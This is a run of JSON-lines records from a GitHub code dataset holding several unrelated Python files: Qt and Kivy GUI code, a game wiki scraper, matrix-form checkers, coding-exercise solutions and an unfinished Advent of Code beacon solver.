self._signalling_struct.build(self)\n\n def get(self, name: str, default: object = None):\n if isinstance(name, str):\n return getattr(self, name, default)\n\n def __getitem__(self, key):\n return getattr(self, key)\n\n def __contains__(self, key):\n return hasattr(self, key)\n\n def __bytes__(self) -> bytes:\n return self._signalling_struct.build(self)\n","repo_name":"tufbel/PythonTools","sub_path":"src/my_tools/pystruct_tools/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74352313766","text":"\nfrom os import set_inheritable\nfrom typing import Optional\nfrom Globals import Colors, Math\n\nfrom PySide6.QtGui import QBitmap, QColor, QFocusEvent, QImage, QKeyEvent, QPainter, QPen, QPixmap\nfrom PySide6.QtWidgets import QApplication, QGraphicsItem, QGraphicsItemGroup, QGraphicsLineItem, QGraphicsRectItem, QGraphicsSceneContextMenuEvent, QGraphicsSceneHoverEvent, QGraphicsSceneMouseEvent, QListWidgetItem, QMenu, QStyleOptionGraphicsItem, QWidget\nfrom PySide6.QtCore import QPoint, QRect, QRectF, QSize, Qt\n\nclass OverlayListWidgetItem(QListWidgetItem):\n\n def __init__(self, parent: QWidget, text):\n\n super().__init__(text)\n self.parent = parent\n\nclass OverlayPreviewGraphicsItem(QGraphicsRectItem):\n\n def __init__(self, parent: QWidget, x: int, y: int, width: int, height: int):\n\n super().__init__(x, y, width, height)\n self.setAcceptHoverEvents(True)\n self.setFlag(QGraphicsItem.ItemIsMovable, True)\n self.setFlag(QGraphicsItem.ItemIsSelectable, True)\n self.setFlag(QGraphicsRectItem.ItemSendsGeometryChanges, True)\n self.setFlag(QGraphicsRectItem.ItemSendsScenePositionChanges, True)\n self.setBrush(Qt.NoBrush)\n self.setPen(Qt.NoPen)\n\n self.parent = parent\n self.isDragging = False\n self.setDefaultImage()\n\n def source(self) -> str: \n\n return self.__source\n\n def image(self) -> QImage:\n\n return self.__image\n\n def setDefaultImage(self):\n\n self.__source = ''\n self.__image = QImage('./images/no_image.jpg')\n self.__image = self.__image.scaled(\n\n QSize(self.rect().width(), self.rect().height()), \n Qt.AspectRatioMode.IgnoreAspectRatio, \n Qt.TransformationMode.FastTransformation\n )\n\n def setSource(self, source: str):\n\n self.setImage(source)\n\n def setImage(self, source):\n\n if source == '': \n\n self.setDefaultImage()\n return \n\n self.__source = source\n self.__image = QImage(source)\n self.__image = self.__image.scaled(\n\n QSize(self.rect().width(), self.rect().height()), \n Qt.AspectRatioMode.IgnoreAspectRatio, \n Qt.TransformationMode.FastTransformation\n )\n\n def itemChange(self, change: QGraphicsItem.GraphicsItemChange, value):\n\n if change == QGraphicsItem.ItemSelectedChange:\n\n self.parent.selectItem(value, graphics=self)\n\n return super().itemChange(change, value)\n\n def hoverEnterEvent(self, event: QGraphicsSceneHoverEvent):\n \n QApplication.instance().setOverrideCursor(Qt.CursorShape.OpenHandCursor)\n super().hoverEnterEvent(event)\n\n def hoverLeaveEvent(self, event: QGraphicsSceneHoverEvent):\n \n QApplication.instance().restoreOverrideCursor()\n super().hoverLeaveEvent(event)\n\n def mousePressEvent(self, event: QGraphicsSceneMouseEvent):\n\n if event.button() is Qt.MouseButton.LeftButton:\n\n self.isDragging = True\n QApplication.instance().setOverrideCursor(Qt.CursorShape.ClosedHandCursor)\n else:\n\n self.isDragging = False\n QApplication.instance().restoreOverrideCursor()\n\n 
super().mousePressEvent(event)\n\n def mouseReleaseEvent(self, event: QGraphicsSceneMouseEvent):\n\n if event.button() is Qt.MouseButton.LeftButton:\n\n self.isDragging = False\n self.setPos(Math.gridSnap(self.x(), self.y(), self.parent.cellSize))\n self.parent.updateItem(graphics=self)\n\n QApplication.instance().setOverrideCursor(Qt.CursorShape.OpenHandCursor)\n super().mouseReleaseEvent(event)\n\n def setRect(self, x, y, width, height):\n\n pos = Math.gridSnap(x, y, self.parent.cellSize)\n size = Math.gridSnap(width, height, self.parent.cellSize)\n\n super().setRect(0, 0, size.x(), size.y())\n self.setPos(pos.x(), pos.y())\n self.setImage(self.source())\n \n def paint(self, painter: QPainter, option, widget):\n\n painter.drawImage(0, 0, self.image())\n if self.isSelected(): \n \n painter.setBrush(Qt.BrushStyle.NoBrush)\n painter.setPen(Qt.PenStyle.DashLine)\n painter.drawRect(self.rect().x(), self.rect().y(), self.rect().width(), self.rect().height())\n\n def mouseMoveEvent(self, event: QGraphicsSceneMouseEvent):\n\n if not self.isDragging: return \n\n goalX = event.scenePos().x() - event.lastScenePos().x() + self.scenePos().x()\n goalY = event.scenePos().y() - event.lastScenePos().y() + self.scenePos().y()\n\n self.setX(Math.clamp(goalX, 0, self.parent.screenPreviewItem.width - self.rect().width()))\n self.setY(Math.clamp(goalY, 0, self.parent.screenPreviewItem.height - self.rect().height()))\n super().mouseMoveEvent(event)\n\n def contextMenuEvent(self, event: QGraphicsSceneContextMenuEvent):\n\n contextMenu = QMenu(self.parent)\n deleteItem = contextMenu.addAction('Delete')\n renameItem = contextMenu.addAction('Rename')\n\n deleteItem.setShortcut('Delete')\n action = contextMenu.exec(event.screenPos())\n \n if action is deleteItem: self.parent.deleteItem(graphics=self)\n\n def screenClamp(self, x, y, w, h) -> QPoint:\n\n return QPoint(\n \n Math.clamp(x, 0, self.parent.screenPreviewItem.width - w), \n Math.clamp(y, 0, self.parent.screenPreviewItem.height - h)\n )\n\nclass ScreenPreviewItem(QGraphicsItemGroup):\n\n def __init__(self, width: int, height: int, cellSize: int):\n\n super().__init__()\n \n self.width = width\n self.height = height \n self.cellSize = cellSize\n screen = QGraphicsRectItem(0, 0, width, height)\n screen.setBrush(QColor(Colors.GraySelected))\n screen.setPen(QColor(Colors.GraySelected))\n \n self.addToGroup(screen)\n self.drawGrid()\n\n def drawGrid(self):\n\n # Vertical\n for i in range(1, self.width // self.cellSize):\n\n x = i * self.cellSize\n mid = self.width // self.cellSize // 2\n\n line = QGraphicsLineItem(x, 0, x, self.height) \n if i == mid: line = QGraphicsLineItem(x, -self.cellSize, x, self.height + self.cellSize) \n else: line.setOpacity(0.2)\n\n line.setPen(QColor(Colors.White))\n self.addToGroup(line)\n\n # Horizontal\n for i in range(1, self.height // self.cellSize):\n\n y = i * self.cellSize\n mid = self.height // self.cellSize // 2\n\n line = QGraphicsLineItem(0, y, self.width, y)\n if i == mid: line = QGraphicsLineItem(-self.cellSize, y, self.width + self.cellSize, y)\n else: line.setOpacity(0.2)\n\n line.setPen(QColor(Colors.White))\n self.addToGroup(line)\n\nclass OverlayFinalGraphicsItem(QGraphicsRectItem):\n\n def __init__(self, preview: OverlayPreviewGraphicsItem):\n\n self.__preview = preview \n super().__init__()\n \n def preview(self) -> OverlayPreviewGraphicsItem:\n\n return self.__preview\n\n def paint(self, painter: QPainter, option, widget):\n \n x = self.preview().x()\n y = self.preview().y()\n \n if self.preview().image() is not 
None: painter.drawImage(x, y, self.preview().image())","repo_name":"kdmoss/elayvate","sub_path":"Items.py","file_name":"Items.py","file_ext":"py","file_size_in_byte":7344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"873611059","text":"import os\n\n# ====================== KIVY\ntry:\n    from kivy.config import Config\n    # Application window size\n    Config.set('graphics', 'width', '900')\n    Config.set('graphics', 'height', '400')\n\n    from kivy.app import App\n    from kivy import platform\n    from kivy.lang import Builder\n    from kivy.properties import Clock\n    from kivy.core.audio import SoundLoader\n    from kivy.properties import ObjectProperty\n    from kivy.properties import StringProperty\n    from kivy.properties import NumericProperty\n    from kivy.uix.relativelayout import RelativeLayout\n    from kivy.graphics.vertex_instructions import Line\n    from kivy.graphics.context_instructions import Color\n    from kivy.graphics.vertex_instructions import Triangle\n\n    from kivy.core.window import Window\n    # KEYBOARD SHORTCUTS FOR THE APPLICATION\n\nexcept ModuleNotFoundError:\n    os.system('python -m pip install \"kivy[base]\" --pre --extra-index-url https://kivy.org/downloads/simple/')\n# ====================== END OF KIVY\n\n# IMPORT [message.py]\nfrom msg import message\n\n# IMPORT [GalaxyFunctions]\nfrom GalaxyFunctions.Movement import MovementApp\nfrom GalaxyFunctions.Movement import CoordinatesApp\nfrom GalaxyFunctions.Movement import CollisionsApp\n# ====================== END OF IMPORTs\nBuilder.load_file(\"GalaxyFunctions/Menu.kv\")\nclass PlatformCheck:\n    \"\"\"\n    Platform check for the application.\n\n    ...\n\n    FUNCTIONS\n    ----------\n    is_desktop : boolean\n        return True ('linux', 'win', 'macosx') or False\n    \"\"\"\n    def is_desktop(self):\n        \"\"\"\n        Confirm the check with True or False.\n        \"\"\"\n\n        return True if platform in ('linux', 'win', 'macosx') else False\n\nclass MainWidget(RelativeLayout, MovementApp, CoordinatesApp, CollisionsApp, PlatformCheck):\n    \"\"\"\n    Widget class.\n\n    ...\n\n    VARIABLES\n    ----------\n    perspective_point_x : any\n    perspective_point_y : any\n\n    line : NoneType\n\n    [VERTICAL LINES]\n    V_NB_LINES : number of lines\n    V_LINES_SPACING : spacing between the lines\n\n    [HORIZONTAL LINES]\n    H_NB_LINES : number of lines\n    H_LINES_SPACING : spacing between the lines\n    \"\"\"\n\n    # Transform.py\n    from GalaxyFunctions.Transform import transform, transform_2D, transform_perspective\n\n    # Keyboard.py\n    from GalaxyFunctions.Keyboard import keyboard_closed, on_keyboard_down, on_keyboard_up, on_touch_down, on_touch_up\n\n    perspective_point_x = NumericProperty(0)\n    perspective_point_y = NumericProperty(0)\n\n    V_NB_LINES = 8\n    V_LINES_SPACING = .4\n    vertical_lines = []\n\n    H_NB_LINES = 15\n    H_LINES_SPACING = .1\n    horizontal_lines = []\n\n    delay = 4\n    NB_TILES = 8 + 4\n    tiles = []\n    tiles_coordinates = []\n\n    SPEED = .8\n    SPEED_X = 3.0\n\n    current_offset_x = 0\n    current_offset_y = 0\n\n    current_speed_x = 0\n    current_y_loop = 0\n\n    state_game_over = False\n    state_game_has_started = False\n    points_game = StringProperty(\"SCORE: 0\")\n\n    menu_widget = ObjectProperty()\n\n    SHIP_WIDTH = .09\n    SHIP_HEIGHT = 0.050\n    SHIP_BASE_Y = 0.04\n    ship = None\n    ship_coordinates = []\n\n    menu_title = StringProperty(\"G A L A X Y\")\n    menu_button_title = StringProperty(\"START\")\n\n    sound_begin = None\n    sound_galaxy = None\n    sound_gameover_impact = None\n    sound_gameover_voice = None\n    sound_music1 = None\n    sound_restart = None\n\n    def 
__init__(self, **kwargs):\n        super(MainWidget, self).__init__(**kwargs)\n        # print(f'INIT\\nW: {self.width}\\nH: {self.height}')\n        self.init_audio()\n        self.init_vertical_lines()\n        self.init_horizontal_lines()\n\n        # class CoordinatesApp\n        self.init_tiles()\n        # main\n        self.init_ship()\n\n        self.reset_game()\n\n        if self.is_desktop():\n            self._keyboard = Window.request_keyboard(self.keyboard_closed, self)\n            self._keyboard.bind(on_key_down=self.on_keyboard_down)\n            self._keyboard.bind(on_key_up=self.on_keyboard_up)\n\n        Clock.schedule_interval(self.update, 1.0 / 60.0)\n        self.sound_galaxy.play()\n\n    def init_audio(self):\n        self.sound_begin = SoundLoader.load(\"assets/audio/begin.wav\")\n        self.sound_galaxy = SoundLoader.load(\"assets/audio/galaxy.wav\")\n        self.sound_gameover_impact = SoundLoader.load(\"assets/audio/gameover_impact.wav\")\n        self.sound_gameover_voice = SoundLoader.load(\"assets/audio/gameover_voice.wav\")\n        self.sound_music1 = SoundLoader.load(\"assets/audio/music1.wav\")\n        self.sound_restart = SoundLoader.load(\"assets/audio/restart.wav\")\n\n        self.sound_music1.volume = 1\n        self.sound_begin.volume = .25\n        self.sound_galaxy.volume = .25\n        self.sound_gameover_voice.volume = .25\n        self.sound_restart.volume = .25\n        self.sound_gameover_impact.volume = .6\n\n    def init_ship(self):\n        with self.canvas:\n            Color(0, 0, 0)\n            self.ship = Triangle()\n\n    def update_ship(self):\n        center_x = self.width / 2\n        ship_half_width = self.SHIP_WIDTH * self.width / 2\n\n        base_y = self.SHIP_BASE_Y * self.height\n        ship_height = self.SHIP_HEIGHT * self.height\n\n        self.ship_coordinates = [\n            (center_x - ship_half_width, base_y),\n            (center_x, base_y + ship_height),\n            (center_x + ship_half_width, base_y)\n        ]\n\n        x1, y1 = self.transform(*self.ship_coordinates[0])\n\n        x2, y2 = self.transform(*self.ship_coordinates[1])\n\n        x3, y3 = self.transform(*self.ship_coordinates[2])\n\n        self.ship.points = [\n            x1, y1,\n            x2, y2,\n            x3, y3\n        ]\n\n    def init_vertical_lines(self):\n        \"\"\"\n        Generate the vertical lines.\n        \"\"\"\n\n        with self.canvas:\n            Color(1, 1, 1)\n\n            # self.line = Line(\n            #     points=[100, 0, 100, 100]\n            # )\n\n            for i in range(0, self.V_NB_LINES):\n                self.vertical_lines.append(Line())\n\n    def init_horizontal_lines(self):\n        \"\"\"\n        Generate the horizontal lines.\n        \"\"\"\n\n        with self.canvas:\n            Color(1, 1, 1)\n\n            for i in range(0, self.H_NB_LINES):\n                self.horizontal_lines.append(Line())\n\n    def update_vertical_lines(self):\n        \"\"\"\n        Update positions to keep the vertical lines centered.\n        \"\"\"\n        # self.line.points = [center_x, 0, center_x, 100]\n        start_index = -int(self.V_NB_LINES/2) + 1\n\n        for i in range(start_index, start_index+self.V_NB_LINES):\n            line_x = self.get_line_x_from_index(i)\n\n            x1, y1 = self.transform(line_x, 0)\n            x2, y2 = self.transform(line_x, self.height)\n\n            self.vertical_lines[i].points = [x1, y1, x2, y2]\n\n    def update_horizontal_lines(self):\n        \"\"\"\n        Update positions to keep the horizontal lines centered.\n        \"\"\"\n\n        start_index = -int(self.V_NB_LINES/2) + 1\n        end_index = start_index + self.V_NB_LINES - 1\n\n        xmin = self.get_line_x_from_index(start_index)\n        xmax = self.get_line_x_from_index(end_index)\n\n        for i in range(0, self.H_NB_LINES):\n            line_y = self.get_line_y_from_index(i)\n\n            x1, y1 = self.transform(xmin, line_y)\n            x2, y2 = self.transform(xmax, line_y)\n\n            self.horizontal_lines[i].points = [x1, y1, x2, y2]\n\n    def on_menu_button_pressed(self):\n        \"\"\"\n        Start the game.\n        \"\"\"\n\n        if self.state_game_over:\n            self.sound_restart.play()\n\n        else:\n            
self.sound_begin.play()\n\n        # init_audio\n        self.sound_music1.play()\n\n        self.reset_game()\n        self.state_game_has_started = True\n        self.menu_widget.opacity = 0\n\n    def reset_game(self):\n        \"\"\"\n        Reset the game.\n        \"\"\"\n\n        self.current_offset_x = 0\n        self.current_offset_y = 0\n\n        self.current_speed_x = 0\n        self.current_y_loop = 0\n\n        self.tiles_coordinates = []\n\n        # main\n        self.pre_fill_tiles_coordinates()\n        self.generate_tiles_coordinates()\n        self.state_game_over = False\n\n\nclass Galaxy(App):\n    \"\"\"\n    GALAXY application main class\n    \"\"\"\n\n    pass\n\nif __name__ == '__main__':\n    try:\n        os.system('cls')\n        message.message()\n        message.success()\n\n        # ====================== KIVY\n        Galaxy().run()\n\n    except (AttributeError) as error:\n        message.error(error)\n\n    except KeyboardInterrupt:\n        message.Interrupt()","repo_name":"Baku-Stark/Galaxy","sub_path":"Galaxy_Kivy/Galaxy_App.py","file_name":"Galaxy_App.py","file_ext":"py","file_size_in_byte":8698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34061461952","text":"from bs4 import BeautifulSoup\nfrom urllib.parse import urljoin\nfrom datetime import datetime\nimport requests\nimport csv\n\nbase = 'https://wiki.project1999.com/'\nnpclinks = 'step2b_cleanup.txt'\n\ndef cyclelinks(filename):\n    global urList\n    # include .txt when passing in filename\n    fileopen = open(filename).readlines()\n    urList = [listitem.rstrip() for listitem in fileopen]\n    # print(urList)\n\ncyclelinks(npclinks)\n\nmaxurlnum = len(urList)\nprint(maxurlnum)\n\nuindex = 0\ndef getstats():\n    global uindex\n    while uindex < maxurlnum:\n        scrapeurl = urList[uindex]\n        #index of a list, in a file.\n        req = requests.get(scrapeurl)\n        soup = BeautifulSoup(req.content, 'html.parser')\n\n        # # Get Wiki Entry Title [of the mob...] 
&& print it\n wikititle = soup.title.string.replace(' - Project 1999 Wiki', '')\n print(wikititle)\n\n happtable = soup.find(\"table\", attrs={\"class\": \"mobStatsBox\"})\n happtable_data = happtable.findAll(\"tr\")\n # open a CSV file with append, so old data will not be erased\n\n statrow = []\n for mobStats in happtable_data: \n res = mobStats.find('td') \n if res: \n mobInfo = res.text.strip()\n statrow.append(mobInfo)\n \n with open('step3.csv', 'a+') as statsfile:\n csvstats = csv.writer(statsfile)\n csvstats.writerow([wikititle, statrow, scrapeurl])\n\n # advance to the next URL; the while condition above ends the scan\n uindex += 1\n\n #print(uindex)\n\ngetstats()","repo_name":"calvinmorett/mobinfo","sub_path":"step3_mobstats.py","file_name":"step3_mobstats.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15921089126","text":"'''\nCreated on Jul 8, 2014\n\n@author: user\n'''\n\nimport wx\nimport wx.richtext\nfrom lxml import etree\nimport wx.dataview as dv\n\n\nclass TreePanelView(wx.Panel):\n '''\n shows tree control in this panel\n '''\n def __init__(self, parent):\n '''\n Constructor\n '''\n wx.Panel.__init__(self, parent = parent)\n sizer = wx.BoxSizer(wx.VERTICAL)\n self.SetBackgroundColour('#ffffff')\n self.SetSizerAndFit(sizer)\n \n def updateTree(self, root):\n self.dvtc = dvtc = dv.DataViewTreeCtrl(self)\n\n isz = (16,16)\n il = wx.ImageList(*isz)\n fldridx = il.AddIcon(wx.ArtProvider.GetIcon(wx.ART_FOLDER, wx.ART_OTHER, isz))\n fldropenidx = il.AddIcon(wx.ArtProvider.GetIcon(wx.ART_FOLDER_OPEN, wx.ART_OTHER, isz))\n fileidx = il.AddIcon(wx.ArtProvider.GetIcon(wx.ART_NORMAL_FILE, wx.ART_OTHER, isz))\n dvtc.SetImageList(il)\n\n self.root = dvtc.AppendContainer(dv.NullDataViewItem,\n \"The Root Item\",\n fldridx, fldropenidx)\n for x in range(15):\n child = dvtc.AppendContainer(self.root, \"Item %d\" % x,\n fldridx, fldropenidx)\n\n for y in range(5):\n last = dvtc.AppendContainer(\n child, \"item %d-%s\" % (x, chr(ord(\"a\")+y)),\n fldridx, fldropenidx)\n\n for z in range(5):\n item = dvtc.AppendItem(\n last, \"item %d-%s-%d\" % (x, chr(ord(\"a\")+y), z),\n fileidx)\n\n # Set the layout so the treectrl fills the panel\n bsizer = wx.BoxSizer()\n bsizer.Add(self.dvtc, 1, wx.EXPAND)\n self.SetSizerAndFit(bsizer)\n \n \nclass EditPanelView(wx.Panel):\n '''\n shows the rich-text editor in this panel\n '''\n def __init__(self, parent):\n '''\n Constructor\n '''\n wx.Panel.__init__(self, parent = parent)\n sizer = wx.BoxSizer(wx.VERTICAL)\n self.SetBackgroundColour('#D3D3D3')\n self.SetSizerAndFit(sizer)\n \n def updateEditor(self, root):\n \n self.SetBackgroundColour(\"white\")\n \n xmltr = etree.tostring(root, encoding='utf8', method='xml')\n \n \n self.rich = wx.richtext.RichTextCtrl( self, size = wx.DisplaySize(), style = wx.WANTS_CHARS | wx.richtext.RE_MULTILINE )\n \n bsizer = wx.BoxSizer()\n bsizer.Add(self.rich, 1, wx.EXPAND)\n self.SetSizerAndFit(bsizer)\n \n self.rich.WriteText(xmltr)\n self.rich.Newline()\n self.rich.EndLeftIndent()","repo_name":"nagdev/xmleditor","sub_path":"0.01/PanelViews.py","file_name":"PanelViews.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34715177682","text":"import numpy as np\n\ndef checkREF(matrix, with_pivots=False):\n pivots = []\n currentOne = 0\n for row, i in enumerate(matrix):\n oneFound = False\n for 
col, j in enumerate(i):\n\n if j == 0:\n continue\n\n if not oneFound and j != 1:\n return (False, pivots) if with_pivots else False\n \n if currentOne <= col:\n pivots.append((row, col))\n currentOne = col\n oneFound = True\n break\n else:\n return (False, pivots) if with_pivots else False\n\n else:\n if not oneFound:\n currentOne = j\n\n return (True, pivots) if with_pivots else True\n\ndef checkRREF(matrix):\n ok, pivots = checkREF(matrix, True)\n if ok:\n for row, col in pivots:\n if sum(matrix[:, col]) != 1:\n return False\n return True\n return False\n\n","repo_name":"MrRhuezzler/Programs","sub_path":"Sem_5/SCL/PS1/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"14827265136","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\ndef missingNumbers(arr, brr):\n counts = {}\n ans = []\n\n for i in arr:\n if i in counts:\n counts[i] += 1\n else:\n counts[i] = 1\n\n for i in brr:\n if i in counts:\n counts[i] -= 1\n else:\n counts[i] = 1\n\n for i in sorted(counts):\n if counts[i] == 0:\n continue\n else:\n ans.append(i)\n\n return ans\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n n = int(input())\n\n arr = list(map(int, input().rstrip().split()))\n\n m = int(input())\n\n brr = list(map(int, input().rstrip().split()))\n\n result = missingNumbers(arr, brr)\n\n fptr.write(' '.join(map(str, result)))\n fptr.write('\\n')\n\n fptr.close()\n","repo_name":"Akshaya-Rajesh/HackerRank-Algorithms","sub_path":"Missing Numbers.py","file_name":"Missing Numbers.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"13751426647","text":"import importlib\nfrom oslo_log import log\n\n\nLOG = log.getLogger('nova.scheduler.filter')\n\n\ndef import_driver(driver_class, driver_path):\n\n LOG.debug(\"importing module from path %s\" % driver_path)\n driver_object = None\n imported_driver_module = importlib.import_module(driver_path)\n try:\n driver_object = getattr(imported_driver_module, driver_class)\n except Exception:\n LOG.warning('Could not load class {} from module {}'.format(driver_class,\n driver_path))\n return driver_object\n\n\ndef parse_nova_hostname(nova_node_name, use_nova_as_is_nodename):\n\n parsed_nova_hostname = nova_node_name\n\n if not use_nova_as_is_nodename:\n parsed_nova_hostname = nova_node_name.split(\".\")[0]\n\n return parsed_nova_hostname\n\n\ndef metric_passes(metric_value, metric_opts_dict):\n operator = metric_opts_dict[\"comparison_operator\"]\n threshold = float(metric_opts_dict[\"threshold\"])\n float_metric_value = float(metric_value)\n if operator == \"greater_than\":\n result = float_metric_value > threshold\n elif operator == \"less_than\":\n result = float_metric_value < threshold\n elif operator == \"equals\":\n result = float_metric_value == threshold\n else:\n raise NotImplementedError\n return result\n\n","repo_name":"teoyaomiqui/nova-ram-filter","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35452205295","text":"\n# https://leetcode-cn.com/problems/k-th-smallest-in-lexicographical-order/\n\nclass Solution:\n # Brute force: materializes and sorts all numbers as strings; times out (TLE)\n def findKthNumberI(self, n: int, k: int) -> int:\n tmp = []\n for i in range(1, n+1):\n tmp.append(str(i))\n\n return int(sorted(tmp)[k-1])\n\n def 
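A quick sanity check for the corrected return logic in checkREF/checkRREF above (a sketch: the matrices are illustrative and the two functions are assumed to be in scope as defined in that record; before the parenthesization fix, every call with the default with_pivots=False returned an always-truthy tuple):

import numpy as np

ref_matrix = np.array([[1, 2, 0, 3],
                       [0, 1, 4, 0],
                       [0, 0, 1, 5]])
rref_matrix = np.array([[1, 0, 0, 3],
                        [0, 1, 0, 0],
                        [0, 0, 1, 5]])
not_ref = np.array([[0, 1, 2],
                    [1, 0, 0]])

assert checkREF(ref_matrix) is True      # valid row-echelon form
assert checkRREF(rref_matrix) is True    # each pivot column sums to 1
assert checkREF(not_ref) is False        # second pivot sits left of the first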
findKthNumber(self, n: int, k: int) -> int:\n cur = 1\n prefix = 1\n\n while cur < k:\n cnt = self.get_count(prefix, n)\n if cur + cnt > k:\n prefix *= 10\n cur += 1\n else:\n prefix += 1\n cur += cnt\n # print(cnt, prefix)\n\n return prefix\n\n def get_count(self, i, n):\n if i <= n:\n cnt = 1\n else:\n return 0\n a = i\n b = i + 1\n while True:\n a = a * 10\n b = b * 10\n if n >= b:\n cnt += b - a\n elif n >= a:\n cnt += n - a + 1\n else:\n break\n return cnt\n\n\ns = Solution()\ns.findKthNumber(20,3)","repo_name":"azhu51/leetcode-practice","sub_path":"bytedance_corpus/hard_440.py","file_name":"hard_440.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23241023035","text":"# You are given an integer array coins of distinct coin denominations, and an integer amount for the total amount of money.\n#\n# Compute and return the number of coin combinations that add up to amount. If no combination of coins can make up the amount, return 0.\n#\n# Assume an unlimited supply of coins of each denomination.\n#\n# The test data guarantees the answer fits in a signed 32-bit integer.\n#\n\n# Outer for-loop over the items (coins), inner for-loop over the knapsack (amounts): this counts combinations\n# Outer for-loop over the knapsack (amounts), inner for-loop over the items (coins): this counts permutations\namount = 5\ncoins = [1, 2, 5]\n\ndef change(amount, coins):\n dp = [0] * (amount + 1)\n dp[0] = 1\n\n for i in range(len(coins)):\n for j in range(coins[i], amount + 1):\n dp[j] += dp[j - coins[i]]\n return dp[-1]\n\nprint(change(amount, coins))","repo_name":"vandeppce/algorithm","sub_path":"10.dynamic programming/518*Change.py","file_name":"518*Change.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40931525482","text":"class Solution:\n def numUniqueEmails(self, emails: List[str]) -> int:\n emails = set(emails)\n\n address = set()\n for e in emails:\n local,domain = e.split('@')\n name = (local.split('+')[0].replace('.','') , domain)\n address.add(name)\n \n return len(address)","repo_name":"Koheki/TIS","sub_path":"2022-12/2022-12-03/LC929_2.py","file_name":"LC929_2.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35482747554","text":"#!/usr/bin/env python3\nfrom setuptools import setup\nfrom distutils.core import setup, Extension\nimport os\nfrom get_include_paths import *\n\nmodule = Extension('setup_test', \n sources = [\n 'sub/setup_pybind11.cpp'\n ],\n include_dirs=[\n get_pybind_include(user=True),\n get_eigen_include(user=True),\n get_boost_include(user=True),\n ],\n extra_compile_args=['-std=c++11', '-fpermissive'],\n )\n \nsetup (name = 'setup_test',\n version = '1.0',\n description = 'Intersections is a library to find the aric of two data sets.',\n install_requires=[\n 'wget >= 3.1',\n 'pybind11',\n ],\n ext_modules = [module])","repo_name":"yuan-yen/Pybind11BuildExample","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32939551622","text":"from collections import defaultdict\nfrom itertools import combinations\nfrom pathlib import Path\nfrom typing import Iterable, Iterator\n\nfrom more_itertools import one\n\nVector = tuple[int, int, int]\nPair = tuple[Vector, Vector]\nScanners = dict[int, list[Vector]]\n\n\ndef parse_scanners() -> Scanners:\n scanners: Scanners = Scanners()\n\n with open(Path(__file__).parent / \"input.txt\") as file:\n for line in file:\n data = line.split()\n if len(data) == 4:\n scanner_id = int(data[2])\n scanners[int(scanner_id)] = []\n elif len(data) == 
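The loop-order comments in the coin-change record above are worth pinning down with a counterpart: swapping the loops turns the combination count into a count of ordered sequences (permutations). A minimal sketch reusing the same dp idea (the function name is mine, not from the record; change() is assumed in scope as defined there):

def change_permutations(amount, coins):
    # Outer loop over amounts, inner loop over coins:
    # different orderings of the same coins are now counted separately.
    dp = [0] * (amount + 1)
    dp[0] = 1
    for j in range(1, amount + 1):
        for coin in coins:
            if coin <= j:
                dp[j] += dp[j - coin]
    return dp[amount]

print(change(5, [1, 2, 5]))               # 4 combinations
print(change_permutations(5, [1, 2, 5]))  # 9 ordered sequences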
1:\n x, y, z = tuple(map(int, data[0].split(\",\")))\n scanners[scanner_id].append((x, y, z))\n return scanners\n\n\ndef distance(a: Vector, b: Vector) -> float:\n x1, y1, z1 = a\n x2, y2, z2 = b\n return ((x2 - x1) ** 2 + (y2 - y1) ** 2 + (z2 - z1) ** 2) ** 0.5\n\n\ndef manhattan_distance(a: Vector, b: Vector) -> float:\n x1, y1, z1 = a\n x2, y2, z2 = b\n return abs(x1 - x2) + abs(y1 - y2) + abs(z1 - z2)\n\n\ndef roll(v: Vector) -> Vector:\n return v[0], v[2], -v[1]\n\n\ndef turn(v: Vector) -> Vector:\n return -v[1], v[0], v[2]\n\n\ndef generate_rotations(v: Vector) -> Iterator[Vector]:\n\n for _ in range(2):\n for _ in range(3): # Yield RTTT 3 times\n v = roll(v)\n yield v # Yield R\n for _ in range(3): # Yield TTT\n v = turn(v)\n yield v\n v = roll(turn(roll(v))) # Do RTR\n\n\ndef find_everything() -> tuple[set[Vector], set[Vector]]:\n scanners = parse_scanners()\n\n distances = dict[int, dict[float, Pair]]()\n\n base_beacons = scanners[0]\n known_scanners = {0}\n known_beacons = set(base_beacons)\n distances[0] = {}\n for a, b in combinations(known_beacons, 2):\n distances[0][distance(a, b)] = (a, b)\n known_scanner_locations = {(0, 0, 0)}\n\n while len(known_scanners) < len(scanners):\n for scanner, beacons in scanners.items():\n if scanner in known_scanners:\n continue\n single_matches = match_to_known_beacons(beacons, distances.values())\n if single_matches is None:\n continue\n\n rotators = {beacon: generate_rotations(beacon) for beacon in beacons}\n\n for _ in range(24):\n offsets = set[Vector]()\n rotated_beacons = list[Vector]()\n\n for beacon, rotator in rotators.items():\n xx, yy, zz = next(rotator)\n 